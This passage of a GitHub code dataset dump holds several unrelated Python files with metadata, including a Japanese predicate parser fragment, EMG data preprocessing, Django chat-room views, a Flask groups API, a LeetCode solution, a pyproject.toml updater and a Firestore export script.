'できるようにする', 'verb_start': start, 'verb_end': end - 4, 'sub_verb_start': end - 4, 'sub_verb_end': end}\n                    elif doc[end].norm_ == '成る':\n                        return {'verb': '', 'sub_verb': self.compaound(i, end, *doc), 'verb_start': -1, 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n                    elif doc[end].norm_ == '為る':\n                        if doc[i - 1].tag_ == '名詞-普通名詞-一般' or doc[i - 1].tag_ == '名詞-普通名詞-サ変可能' or (doc[i - 1].tag_ == '形状詞-一般' and doc[i - 1].head.i == i):\n                            return {'verb': self.compaound(start, end, *doc), 'sub_verb': '', 'verb_start': start, 'verb_end': end, 'sub_verb_start': -1, 'sub_verb_end': -1}\n                        return {'verb': '', 'sub_verb': self.compaound(i, end, *doc), 'verb_start': -1, 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n                    else:\n                        return {'verb': '', 'sub_verb': self.compaound(i, end, *doc) + 'する', 'verb_start': -1, 'verb_end': -1, 'sub_verb_start': i, 'sub_verb_end': end}\n\n                if doc[end - 1].pos_ == \"SCONJ\":\n                    return {'verb': self.compaound(start, i - 2, *doc), 'sub_verb': self.compaound(i, end, *doc), 'verb_start': start, 'verb_end': i - 1, 'sub_verb_start': i, 'sub_verb_end': end}\n                elif doc[end].tag_ == '名詞-普通名詞-サ変可能':\n                    return {'verb': self.compaound(start, i - 1, *doc) + 'する', 'sub_verb': self.compaound(i, end, *doc) + 'する', 'verb_start': start, 'verb_end': i - 1, 'sub_verb_start': i, 'sub_verb_end': end}\n                else:\n                    return {'verb': self.compaound(start, i - 1, *doc) + 'する', 'sub_verb': self.compaound(i, end, *doc), 'verb_start': start, 'verb_end': i - 1, 'sub_verb_start': i, 'sub_verb_end': end}\n            else:\n                if doc[i].pos_ == \"VERB\":\n                    break\n        return {'verb': self.compaound(start, end, *doc), 'sub_verb': '', 'verb_start': start, 'verb_end': end, 'sub_verb_start': -1, 'sub_verb_end': -1}\n","repo_name":"koba-stockmark/PredicateStructuring","sub_path":"predicate_split.py","file_name":"predicate_split.py","file_ext":"py","file_size_in_byte":17144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36972332069","text":"import numpy as np\r\nfrom scipy.sparse import data\r\nfrom tables.atom import EnumAtom\r\nimport ninapro_utils \r\nfrom pathlib import Path \r\nfrom zipfile import ZipFile\r\nimport matplotlib.pyplot as plt \r\nimport collections\r\nimport deepdish as dd \r\nfrom tqdm import tqdm\r\nfrom utils import *\r\n\r\nimport os\r\nimport yaml\r\nimport random \r\nimport sys\r\n\r\n# Read the configuration file for importing model configurations\r\nconfig_path = Path(__file__).parents[1] / 'config.yml'\r\nconfig = yaml.load(open(config_path, 'r'), Loader=yaml.SafeLoader)\r\n\r\ndb2_path = Path(__file__).parents[1] / 'data/raw/DB2_zip/'\r\ndb2_extract_dir = 
Path(__file__).parents[1] / 'data/raw/DB2/'\r\ndb2_savepath = Path(__file__).parents[1] / 'data/interm/DB2.h5'\r\n\r\nos.makedirs(db2_extract_dir, exist_ok=True)\r\nos.makedirs(Path(__file__).parents[1] / 'data/interm/', exist_ok=True)\r\n \r\n###############################################################\r\n# Extract individual zip files of subjects' second dataset of DB2\r\n###############################################################\r\nwith skip_run('skip', 'Extract the second dataset from Ninapro DB2') as check, check():\r\n for file in tqdm(os.listdir(db2_path)):\r\n # extract if the file is a zip file\r\n if (file.split(\".\")[1] == 'zip') and (file.split(\"_\")[0] == 'DB2'):\r\n filepath = os.path.join(db2_path, file)\r\n with ZipFile(filepath, 'r') as zip_ref:\r\n zip_ref.extractall(db2_extract_dir)\r\n\r\n##################################################################################################\r\n# Run the following chunk of code if the exercise 1 (17 classes) should be saved into hdf5 file \r\n##################################################################################################\r\nwith skip_run('skip', 'Import DB2 dataset and save it into HDF5 format') as check, check():\r\n data_dict = collections.defaultdict()\r\n for subject in tqdm(np.arange(1, config['num_subjects']+1)):\r\n # Get EMG, repetition and movement data, cap max length of rest data before and after each movement to 5 seconds\r\n # Capping occurs by reducing the size of repetition segments since splitting is based on repetition number\r\n sub_dict = ninapro_utils.import_db2(db2_extract_dir, subject, rest_length_cap=5)\r\n\r\n data_dict['S'+str(subject)] = sub_dict\r\n \r\n dd.io.save(db2_savepath, data_dict)\r\n\r\n##################################################################\r\n# Run the following code to split the raw dataset and normalize it \r\n##################################################################\r\nbatch_data_path = Path(__file__).parents[1] / 'data/interm/DB2_batch.h5'\r\nwith skip_run('skip', 'Create EMG samples of constant length windows (wind_size x channels)') as check, check(): \r\n window_len = int(np.round(config['window_size'] * config['fs']))\r\n n_channels = config['n_channels']\r\n overlap_perct = config['window_overlap']\r\n \r\n data = dd.io.load(db2_savepath)\r\n batch_data = collections.defaultdict()\r\n\r\n for subject in tqdm(np.arange(1, config['num_subjects']+1)):\r\n rep_regions = data['S'+str(subject)]['rep_regions']\r\n emg = data['S'+str(subject)]['emg']\r\n \r\n # apply mu-law transformation and then normalize the data\r\n emg = ninapro_utils.mu_law_transformation(emg)\r\n emg = ninapro_utils.minmax_normalization(emg)\r\n \r\n emg_splits = []\r\n for i in range(0, len(rep_regions), 2):\r\n rep_len = rep_regions[i+1] - rep_regions[i]\r\n assert window_len < rep_len, \"The repetition data is too short\"\r\n \r\n num_segs = int((np.floor(rep_len / window_len) - 1) / (1 - overlap_perct))\r\n step_size = int((1 - overlap_perct) * window_len)\r\n last_ind = int(rep_regions[i] + window_len * ( 1 + (1 - overlap_perct) *num_segs))\r\n\r\n emg_temp = emg[rep_regions[i]:last_ind, :]\r\n \r\n # split each repetition of emg into small windows of constant window_len\r\n for j in range(0, emg_temp.shape[0] - window_len + 1, step_size):\r\n emg_splits.append(np.expand_dims(emg_temp[j:j+window_len, :], axis=0))\r\n \r\n emg_splits = np.concatenate(emg_splits, axis=0)\r\n \r\n batch_data['S'+str(subject)] = emg_splits\r\n \r\n dd.io.save(batch_data_path, 
batch_data)\r\n \r\n##################################################################\r\n# Split train and test data\r\n##################################################################\r\nwith skip_run('skip', 'Creating batches of dataset using random subjects and samples for training the encoder') as check, check():\r\n data = dd.io.load(batch_data_path)\r\n \r\n # shuffled subject list \r\n subjects = [15, 7, 32, 9, 8, 18, 37, 31, 3, 35, 19, 36, 33, 6, 11, 29, 1, 34, 21, 17, 24, 25, 27, 13,\r\n 23, 12, 20, 16, 30, 10, 5, 28, 2, 26, 40, 4, 22, 38, 39, 14]\r\n \r\n # shuffle the samples of each subject \r\n for sub in subjects:\r\n data['S'+str(sub)] = ninapro_utils.shuffle_emg_samples(data['S'+str(sub)])\r\n \r\n n = config['batch_param']['n'] # number of subjects required in each batch\r\n m = config['batch_param']['m'] # number of samples per subject in each batch\r\n\r\n train_feats, train_labels = [], []\r\n test_feats, test_labels = [], []\r\n valid_feats, valid_labels = [], [] # samples removed from the training set (These can be used for validation)\r\n\r\n train_subjects = subjects[:-2]\r\n test_subjects = subjects[-2:]\r\n\r\n while len(train_subjects) > n:\r\n batch_subjects = random.sample(train_subjects, k=n)\r\n batch_samples, batch_labels = [], []\r\n for subject in batch_subjects:\r\n emg = data['S'+str(subject)]\r\n \r\n batch_samples.append(emg[:m, :, :])\r\n batch_labels.append(subject * np.ones(m, dtype=np.int8))\r\n \r\n # delete the already retrieved samples from the subject dictionary\r\n emg = np.delete(emg, np.arange(m), axis=0)\r\n data['S'+str(subject)] = emg \r\n \r\n batch_samples = np.concatenate(batch_samples, axis=0)\r\n batch_labels = np.concatenate(batch_labels, axis=0)\r\n \r\n train_feats.append(batch_samples)\r\n train_labels.append(batch_labels)\r\n \r\n delete_subjects, valid_feats, valid_labels = ninapro_utils.prune_subject_list(train_subjects, data, n, m, valid_feats, valid_labels)\r\n \r\n # update the subject list\r\n train_subjects = list(set(train_subjects) - set(delete_subjects))\r\n \r\n # subjects to be removed due to shortage of samples\r\n for sub in delete_subjects:\r\n del data['S'+str(sub)]\r\n \r\n train_feats = np.concatenate(train_feats, axis=0)\r\n train_labels = np.concatenate(train_labels, axis=0)\r\n \r\n for sub in data.keys():\r\n valid_feats.append(data[sub])\r\n \r\n labels = int(sub.split('S')[1]) * np.ones(data[sub].shape[0], dtype=np.int8)\r\n valid_labels.append(labels)\r\n \r\n valid_feats = np.concatenate(valid_feats, axis=0)\r\n valid_labels = np.concatenate(valid_labels, axis=0)\r\n \r\n # prepare the test dataset \r\n for subject in subjects[-2:]:\r\n emg = data['S'+str(subject)]\r\n labels = subject * np.ones(emg.shape[0], dtype=np.int8)\r\n\r\n test_feats.append(emg)\r\n test_labels.append(labels)\r\n\r\n test_feats = np.concatenate(test_feats, axis=0)\r\n test_labels = np.concatenate(test_labels, axis=0)\r\n \r\n traindata_savepath = Path(__file__).parents[1] / 'data/processed/Train.h5'\r\n testdata_savepath = Path(__file__).parents[1] / 'data/processed/Test.h5'\r\n validdata_savepath = Path(__file__).parents[1] / 'data/processed/Validation.h5'\r\n \r\n # save the training data in terms of the created batches\r\n # train_data = collections.defaultdict()\r\n # for i, val in enumerate(train_feats):\r\n # train_data['batch_'+str(i)] = {'features': train_feats[i],\r\n # 'labels': train_labels[i]}\r\n \r\n dd.io.save(traindata_savepath, {'features': train_feats,\r\n 'labels': train_labels})\r\n \r\n 
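# note: the dd.io.save calls here persist the train/test/validation splits as HDF5; each can be read back as a dict with 'features' and 'labels' via deepdish's matching loader, e.g. dd.io.load(traindata_savepath)\r\n 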
dd.io.save(testdata_savepath, {'features': test_feats,\r\n 'labels': test_labels})\r\n \r\n dd.io.save(validdata_savepath, {'features': valid_feats,\r\n 'labels': valid_labels})\r\n \r\n\r\n\r\nplt.show()\r\n\r\n","repo_name":"srisadhan/EMG_style_content","sub_path":"src/load_dataset.py","file_name":"load_dataset.py","file_ext":"py","file_size_in_byte":8564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5879525753","text":"from sqlalchemy import Column, String, Integer, ForeignKey\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.sql.sqltypes import Float\nfrom .entity import Entity, Base\n\n\nclass Item(Entity, Base): \n __tablename__ = 'items'\n\n name = Column(String)\n artist = Column(String)\n purchased_price = Column(Float)\n model_number = Column(String)\n manufacturer = Column(String)\n sku = Column(String)\n description = Column(String)\n category_id = Column(Integer, ForeignKey('categories.id'))\n category = relationship(\"Category\")\n city_id = Column(Integer, ForeignKey('cities.id'))\n city = relationship(\"City\")\n state_id = Column(Integer, ForeignKey('states.id'))\n state = relationship(\"State\")\n\n def __init__(self, name, artist, purchased_price, model_number, manufacturer, category_id, city_id, state_id, sku, description, created_by):\n Entity.__init__(self, created_by)\n self.name = name\n self.artist = artist\n self.purchased_price = purchased_price\n self.manufacturer = manufacturer\n self.model_number = model_number\n self.sku = sku\n self.description = description\n self.category_id = category_id\n self.city_id = city_id\n self.state_id = state_id\n","repo_name":"imlocle/my-collection","sub_path":"my-collection-api/src/model/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35622863976","text":"import csv\nfrom django.core.management import BaseCommand\n\n# Import the model \nfrom coffee.models import ratings\n\n\nclass Command(BaseCommand):\n # Show this when the user types help\n help = \"Updates rating dates from the ratings CSV\"\n\n def handle(self, *args, **options):\n \n # Show this before updating the data in the database\n print(\"updating\")\n\n #Code to update the data in the database\n for row in csv.reader(open('C:/Users/jacoma/OneDrive - Microsoft/Desktop/data/coffee_ratings.csv')):\n rate=ratings.objects.get(rating_id=row[0])\n rate.rating_date = row[7]\n rate.save(update_fields=['rating_date'])\n print(row[0])","repo_name":"onthemarq/coffee_app","sub_path":"coffee/management/commands/update_ratings.py","file_name":"update_ratings.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2355146997","text":"from django import forms\r\nfrom django.http.response import HttpResponseRedirect\r\nfrom django.shortcuts import render, redirect\r\nfrom .models import Message, Room, Topic , User\r\nfrom .forms import MessageForm, MyUserCreationForm, RoomForm, UserForm, UserCreationForm\r\nfrom django.db.models import Q\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.contrib import messages\r\nfrom django.contrib.auth import authenticate, login, logout\r\n\r\n# login function\r\n\r\n\r\ndef loginPage(request):\r\n page = \"login\"\r\n if request.user.is_authenticated:\r\n return redirect(\"home\")\r\n if request.method == \"POST\":\r\n email = 
request.POST.get(\"email\")\r\n password = request.POST.get(\"password\")\r\n user = authenticate(request, email=email, password=password)\r\n if user is not None:\r\n userconfirm = User.objects.get(email=email)\r\n login(request, userconfirm)\r\n print(userconfirm.email)\r\n return redirect(\"home\")\r\n else:\r\n messages.error(request, \"Wrong Username or Password\")\r\n context = {\"page\": page}\r\n return render(request, \"chat/login_register.html\", context)\r\n\r\n\r\n# Register\r\n\r\n\r\ndef RegisterPage(request):\r\n form = MyUserCreationForm()\r\n if request.method == \"POST\":\r\n form = MyUserCreationForm(request.POST)\r\n if form.is_valid():\r\n user = form.save(commit=False)\r\n user.username = user.username.lower()\r\n user.save()\r\n login(request, user)\r\n return redirect(\"home\")\r\n else:\r\n messages.error(request, \"An error occured during registration\")\r\n return render(request, \"chat/login_register.html\", {\"form\": form})\r\n\r\n\r\n# Logout function\r\ndef LogoutUser(request):\r\n logout(request)\r\n return redirect(\"home\")\r\n\r\n\r\n# View room\r\n\r\n\r\ndef home(request):\r\n q = request.GET.get(\"q\") if request.GET.get(\"q\") != None else \"\"\r\n rooms = Room.objects.filter(\r\n Q(topic__name__icontains=q)\r\n | Q(name__icontains=q)\r\n | Q(host__username__icontains=q)\r\n )\r\n\r\n topics = Topic.objects.all()\r\n room_count = rooms.count()\r\n room_message = Message.objects.filter(Q(room__topic__name__icontains=q))\r\n context = {\r\n \"rooms\": rooms,\r\n \"topics\": topics,\r\n \"room_count\": room_count,\r\n \"room_message\": room_message,\r\n }\r\n return render(request, \"chat/index.html\", context)\r\n\r\n\r\n# @login_required(login_url='/login')\r\ndef ProfilePage(request, pk):\r\n users = User.objects.get(id=pk)\r\n rooms = users.room_set.all()\r\n topics = Topic.objects.all()\r\n room_message = users.message_set.all()\r\n msgz = \"\"\r\n msg2 = \"\"\r\n for room_msgs in room_message:\r\n msgz = room_msgs.user.username\r\n for room in rooms:\r\n msg2 = room.host.username\r\n context = {\r\n \"users\": users,\r\n \"rooms\": rooms,\r\n \"room_message\": room_message,\r\n \"msgz\": msgz,\r\n \"msg2\": msg2,\r\n \"topics\": topics,\r\n }\r\n return render(request, \"chat/profile.html\", context)\r\n\r\n\r\n# room with ID function\r\n\r\n\r\ndef room(request, pk):\r\n room = Room.objects.get(id=pk)\r\n referrer = request.META[\"HTTP_REFERER\"]\r\n room_messages = (\r\n room.message_set.all()\r\n ) # _set.all() is used for One-to-many relationship\r\n participants = (\r\n room.participants.all()\r\n ) # .all() is used for Many-To-Many relationship\r\n if request.method == \"POST\":\r\n message = Message.objects.create(\r\n user=request.user, room=room, body=request.POST.get(\"body\")\r\n )\r\n room.participants.add(request.user)\r\n return redirect(\"room\", pk=room.id)\r\n context = {\r\n \"room\": room,\r\n \"room_messages\": room_messages,\r\n \"participants\": participants,\r\n }\r\n return render(request, \"chat/room.html\", context)\r\n\r\n\r\n# Create room route here\r\n\r\n\r\n@login_required(login_url=\"/login\")\r\ndef CreateRoom(request):\r\n form = RoomForm()\r\n topics = Topic.objects.all()\r\n if request.method == \"POST\":\r\n topic_name = request.POST.get(\"topic\")\r\n topic, created = Topic.objects.get_or_create(name=topic_name)\r\n form = RoomForm(request.POST)\r\n Room.objects.create(\r\n host=request.user,\r\n topic=topic,\r\n name=request.POST.get(\"name\"),\r\n description=request.POST.get(\"description\"),\r\n )\r\n # if 
form.is_valid():\r\n # room= form.save(commit=False)\r\n # room.host=request.user\r\n # room.save()\r\n return redirect(\"home\")\r\n context = {\"form\": form, \"topics\": topics}\r\n return render(request, \"chat/room_form.html\", context)\r\n\r\n\r\n# Update room here\r\n@login_required(login_url=\"/login\")\r\ndef UpdateRoom(request, pk):\r\n room = Room.objects.get(id=pk)\r\n form = RoomForm(instance=room)\r\n topics = Topic.objects.all()\r\n page_update = \"update\"\r\n if request.user == room.host or request.user.is_superuser == True:\r\n if request.method == \"POST\":\r\n topic_name = request.POST.get(\"topic\")\r\n topic, created = Topic.objects.get_or_create(name=topic_name)\r\n room.name = request.POST.get(\"name\")\r\n room.topic = topic\r\n room.description = request.POST.get(\"description\")\r\n room.save()\r\n return redirect(\"home\")\r\n context = {\r\n \"form\": form,\r\n \"topics\": topics,\r\n \"room\": room,\r\n \"page_update\": page_update,\r\n }\r\n return render(request, \"chat/room_form.html\", context)\r\n referrer = request.META[\"HTTP_REFERER\"]\r\n messages.error(request, \"Sorry, you are not permitted to update this room\")\r\n print(referrer)\r\n return HttpResponseRedirect(referrer)\r\n\r\n # if request.user != room.host:\r\n # referrer = request.META['HTTP_REFERER']\r\n # messages.error(request, 'Sorry, You are not permited to updated this room')\r\n # print(referrer)\r\n # return HttpResponseRedirect(referrer)\r\n # if request.method == 'POST':\r\n # form = RoomForm(request.POST, instance=room)\r\n # if form.is_valid():\r\n # form.save()\r\n # return redirect('home')\r\n # context ={'form':form}\r\n # return render(request, 'chat/room_form.html', context)\r\n\r\n\r\n# Delete view\r\n@login_required(login_url=\"/login\")\r\ndef DeleteRoom(request, pk):\r\n room = Room.objects.get(id=pk)\r\n if request.user == room.host or request.user.is_superuser == True:\r\n if request.method == \"POST\":\r\n room.delete()\r\n return redirect(\"home\")\r\n return render(request, \"chat/delete.html\", {\"obj\": room})\r\n referrer = request.META[\"HTTP_REFERER\"]\r\n messages.error(request, \"Sorry, you are not permitted to delete this room\")\r\n print(referrer)\r\n return HttpResponseRedirect(referrer)\r\n\r\n # if request.user != room.host:\r\n # referrer = request.META['HTTP_REFERER']\r\n # messages.error(request, 'Sorry, You are not permited to delete this room')\r\n # print(referrer)\r\n # return HttpResponseRedirect(referrer)\r\n # if request.user.is_superuser == True:\r\n # if request.method == 'POST':\r\n # room.delete()\r\n # return redirect ('home')\r\n # return render (request, 'chat/delete.html', {'obj': room})\r\n\r\n\r\n# Delete message\r\n@login_required(login_url=\"/login\")\r\ndef DeleteMessage(request, pk):\r\n room_message = Message.objects.get(id=pk)\r\n if request.method == \"POST\":\r\n if request.user == room_message.user or request.user.is_superuser == True:\r\n print(request.user)\r\n room_message.delete()\r\n messages.success(request, \"Message deleted successfully\")\r\n print(request.user.is_superuser)\r\n return redirect(\"home\")\r\n else:\r\n referrer = request.META[\"HTTP_REFERER\"]\r\n messages.error(\r\n request, \"Sorry, you are not permitted to delete this message\"\r\n )\r\n print(referrer)\r\n return HttpResponseRedirect(referrer)\r\n return render(request, \"chat/delete.html\", {\"obj\": room_message})\r\n\r\n\r\n# Update room message here\r\n@login_required(login_url=\"/login\")\r\ndef UpdateMessage(request, pk):\r\n msg_update = 
Message.objects.get(id=pk)\r\n form = MessageForm(instance=msg_update)\r\n if request.user != msg_update.user:\r\n referrer = request.META[\"HTTP_REFERER\"]\r\n messages.error(request, \"Sorry, you are not permitted to update this message\")\r\n print(referrer)\r\n return HttpResponseRedirect(referrer)\r\n if request.method == \"POST\":\r\n form = MessageForm(request.POST, instance=msg_update)\r\n if form.is_valid():\r\n form.save()\r\n return redirect(\"home\")\r\n context = {\"form\": form}\r\n return render(request, \"chat/room_form.html\", context)\r\n\r\n\r\n@login_required(login_url=\"/login\")\r\ndef UpdateUser(request):\r\n user = request.user\r\n form = UserForm(instance=user)\r\n if request.method == \"POST\":\r\n form = UserForm(request.POST, request.FILES,instance=user)\r\n if form.is_valid():\r\n form.save()\r\n return redirect(\"profile-page\", pk=user.id)\r\n return render(request, \"chat/update-user.html\", {\"form\": form})\r\n\r\n\r\ndef TopicsPage(request):\r\n q = request.GET.get(\"q\") if request.GET.get(\"q\") != None else \"\"\r\n topics = Topic.objects.filter(name__icontains=q)\r\n return render(request, \"chat/topics.html\", {\"topics\": topics})\r\n\r\n\r\ndef ActivityPage(request):\r\n room_messages = Message.objects.all()\r\n return render(request, \"chat/activity.html\", {\"room_messages\": room_messages})\r\n\r\n\r\n# rooms = [\r\n# {'id':1, 'name': 'Lets learn python'},\r\n# {'id':2, 'name': 'Lets learn Java'},\r\n# { 'id':3, 'name': 'Lets learn C#'},\r\n# {'id':4, 'name': 'Design with me'},\r\n# ]\r\n\r\n\r\n# def home(request):\r\n# context ={'rooms':rooms}\r\n# return render (request, 'chat/index.html',context)\r\n\r\n# def room(request, pk):\r\n# room = None\r\n# for i in rooms:\r\n# if i['id'] == int(pk):\r\n# room =i\r\n# context = {'room': room}\r\n\r\n# return render (request, 'chat/room.html', context)\r\n","repo_name":"Blazskills/django-chatroom","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70811867306","text":"import glob\nimport os\nimport pprint\n\nimport pyfpgrowth\n\nfrom collections import Counter\nimport itertools\n\nfrom prefixspan import PrefixSpan\n\nfrom src.lib.dockerfiles import Dockerfile, Model\nfrom src.lib.nlps import NLP\nfrom src.lib.words import Token\nfrom src.lib.cluster import Dived\nfrom src.lib.blocks import Hash\n\nfrom gensim.models import word2vec\n\nimport datetime\n\ndef execute(key):\n try:\n model = word2vec.Word2Vec.load(\"./Delivers/result.model\")\n result = model.wv.similarity(\"dcdc06206343aa7476046a5897e11abc9276f1766fb6cdcd900119830b32cf2b\", key)\n # result = model.wv.most_similar(\"dcdc06206343aa7476046a5897e11abc9276f1766fb6cdcd900119830b32cf2b\", topn=10)\n # print(\"rm\", data[key], result)\n except Exception as e:\n return 0\n else:\n return result\n\ndef sub(key):\n return data[key]\n\nPYTHON_PROJECT = \"./python/**\"\ndef main():\n combinations = {}\n file_paths = [comp for comp in glob.glob(PYTHON_PROJECT, recursive=True) if os.path.isfile(comp) if comp.endswith(\"Dockerfile\")]\n global data\n data = {}\n hh = []\n for file_path in file_paths:\n model = Model(file_path)\n shells = model.shells\n\n for shell in shells:\n hash_words = Hash.execute(shell)\n if not [cnt for cnt in hash_words] in hh:\n hh.append([cnt for cnt in hash_words])\n for key, value in hash_words.items():\n if not key in data:\n data[key] = value\n \n results = 
{}\n\n for key, value in data.items():\n if value == \"-rf\":\n nh0 = [h for h in hh if key in h][0]\n command0 = [sub(n) for n in nh0]\n print(command0)\n try:\n nh1 = [h for h in hh if key in h][1]\n except IndexError:\n pass\n else:\n command1 = [sub(n) for n in nh1]\n print(command1)\n print(execute(key), value)\n \n\n \n\n\n \n # results[value] = execute(key) \n\n\n \n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"aoimaru/pydock","sub_path":"read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30500937040","text":"from flask import jsonify, abort, request, Blueprint\nfrom pprint import pprint\nimport logging\nfrom utils.utils import hash_password, check_password\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\n\nfrom data import db_session\nfrom data.models.Users import User\nfrom data.models.Groups import Group\n\nblueprint = Blueprint('groups_api', __name__)\n\n\n@blueprint.route('/api/group/<group_name>', methods=['POST'])\n@jwt_required()\ndef register_group(group_name):\n Group.if_group_already_created(group_name)\n sess = db_session.create_session()\n req = request.get_json(force=True)\n user_id = get_jwt_identity()\n group = Group(\n name=group_name,\n members=[user_id], # must be iterable\n admin=user_id\n )\n sess.add(group)\n sess.commit()\n created_group_id = sess.query(Group.id).filter(Group.name == group_name).first()[0]\n return jsonify({'success': 'OK', \"group_id\": created_group_id}), 200\n\n\n@blueprint.route('/api/group/<group_name>', methods=['PATCH'])\n@jwt_required()\ndef update_group_name(group_name):\n user_id = int(get_jwt_identity())\n Group.if_group_not_found_by_name(group_name)\n Group.if_user_is_not_admin(group_name, user_id)\n req = request.get_json(force=True)\n sess = db_session.create_session()\n group = sess.query(Group).filter(Group.admin == user_id, Group.name == group_name).update({Group.name: req['new_group_name']}, synchronize_session=False)\n sess.commit()\n return jsonify({'success': 'OK'}), 200\n\n","repo_name":"melnk300/heroku","sub_path":"api/groups_api.py","file_name":"groups_api.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38727239551","text":"'''\n###### * User Profile : Keval_78 \nLinkedIn: https://www.linkedin.com/in/kevalpadsala78/\nGithub: https://github.com/Keval78\nLeetcode: https://leetcode.com/Keval_78/\n'''\n\nfrom typing import List\n\nclass Solution:\n def findPeaks(self, mountain: List[int]) -> List[int]:\n n = len(mountain)\n indices = []\n for i in range(1, n-1):\n if mountain[i-1] < mountain[i] > mountain[i+1]:\n indices.append(i)\n \n return indices\n \n\n\n\nmountain = [2,4,4]\nans = Solution().findPeaks(mountain)\nprint(ans)\n\n\nmountain = [1,4,3,8,5]\nans = Solution().findPeaks(mountain)\nprint(ans)\n\n\n","repo_name":"Keval78/Programming_Solutions","sub_path":"LeetCode/Daily/2951 Find the Peaks.py","file_name":"2951 Find the Peaks.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30494349233","text":"##Little helper for Netbeans to handle toml files\n\nimport sys\nfrom pathlib import Path\n\nimport tomlkit\n\ninput_path = sys.argv[1]\nproject_name = sys.argv[2]\nproject_version = sys.argv[3]\nproject_description = sys.argv[4]\nproject_requires_python = sys.argv[5]\ntype = 
sys.argv[6]\n\nfile = Path(input_path)\n\ntry:\n pyproject = tomlkit.loads(file.read_text())\n with file.open(\"w\") as f:\n if type != \"poetry\":\n pyproject[\"project\"][\"name\"] = project_name\n pyproject[\"project\"][\"version\"] = project_version\n pyproject[\"project\"][\"description\"] = project_description\n pyproject[\"project\"][\"requires-python\"] = project_requires_python\n else:\n #pyproject[\"tool\"][\"poetry\"][\"name\"] = project_name\n pyproject[\"tool\"][\"poetry\"][\"version\"] = project_version\n pyproject[\"tool\"][\"poetry\"][\"description\"] = project_description\n pyproject[\"tool\"][\"poetry\"][\"dependencies\"][\n \"python\"\n ] = project_requires_python\n\n f.write(tomlkit.dumps(pyproject))\n sys.exit()\nexcept Exception as e:\n print(\"Error updating pyproject.toml: %s\" % e)\n","repo_name":"albilu/netbeansPython","sub_path":"src/main/resources/org/netbeans/modules/python/toml_handler.py","file_name":"toml_handler.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"71101595629","text":"import argparse\nfrom pathlib import Path\nimport firebase_admin\nfrom firebase_admin import credentials, firestore\nimport json\nfrom typing import NamedTuple\nimport subprocess\nimport time\n\n\nclass FirestoreEncoder(json.JSONEncoder):\n def default(self, obj):\n # Check if the object is an instance of Firestore's datetime type\n if hasattr(obj, \"isoformat\"):\n return obj.isoformat()\n return super(FirestoreEncoder, self).default(obj)\n\n\ndef load_creds(relpath: str):\n cred_archive = Path(\"~/Documents/api_credentials.sparsebundle\").expanduser()\n cred_file = Path(\"/Volumes/creds/\") / relpath\n assert cred_archive.exists(), f\"Sparsebundle does not exist at {cred_archive}\" # pathlib thinks that sparsebundles are directories, not files\n assert cred_file.suffix == \".json\", f\"File {cred_file} does not have .json suffix\"\n if not cred_file.parent.is_dir():\n clout = subprocess.run([\"open\", str(cred_archive)], encoding=\"utf-8\", check=True)\n assert clout.returncode == 0\n timeout = 10 # seconds\n delay = 0.5\n while not cred_file.parent.is_dir():\n time.sleep(delay)\n timeout -= delay\n assert timeout > 0, f\"Timed out waiting for {cred_file.parent} to be mounted\"\n assert cred_file.is_file(), f\"File {cred_file} does not exist\"\n with open(cred_file, \"r\", encoding=\"utf-8\") as f:\n contents = json.load(f)\n Cred = NamedTuple(\"Cred\", data=dict[str, str], path=str)\n return Cred(contents, str(cred_file))\n\n\ndef authorize(credpath: str, encrypted=False):\n\n if encrypted:\n credential = load_creds(credpath)\n cred_path = credential.path\n else:\n cred_path = Path(credpath).expanduser()\n if not cred_path.is_absolute():\n cred_path = (Path(__file__).parent / cred_path).resolve()\n\n assert Path(cred_path).is_file(), f\"File {cred_path} does not exist\"\n\n cred = credentials.Certificate(cred_path)\n\n firebase_admin.initialize_app(cred)\n\n return firestore.client()\n\n\ndef getdata(credpath: str, exportpath: str, collections: list[str], encrypted: bool = False):\n\n export_path = Path(exportpath).expanduser()\n if not export_path.is_absolute():\n export_path = (Path(__file__).parent / export_path).absolute()\n\n if export_path.exists():\n raise Exception(f\"Path {export_path} already exists. 
Aborting to prevent overwriting data.\")\n\n export_path.mkdir(parents=True, exist_ok=True)\n\n db = authorize(credpath, encrypted)\n\n for collection_name in collections:\n\n docs = db.collection(collection_name).stream()\n\n data = {doc.id: doc.to_dict() for doc in docs}\n\n data_path = export_path / f\"{collection_name}.json\"\n\n with open(data_path, \"w\", encoding=\"utf-8\") as json_file:\n json.dump(data, json_file, cls=FirestoreEncoder, indent=2)\n\n\ndef _cli():\n \"\"\"Retrieve data from Firestore and save it locally.\n \"\"\"\n parser = argparse.ArgumentParser(\n prog=\"Data Retriever\",\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n # argument_default=argparse.SUPPRESS\n # epilog=\"Text at the bottom of help\"\n )\n parser.add_argument(\"--cred\", dest=\"credpath\", required=True, help=\"Path to Firebase credentials JSON file\")\n parser.add_argument(\"--out\", dest=\"exportpath\", required=True, help=\"Output directory path\")\n parser.add_argument(\"--collection\", 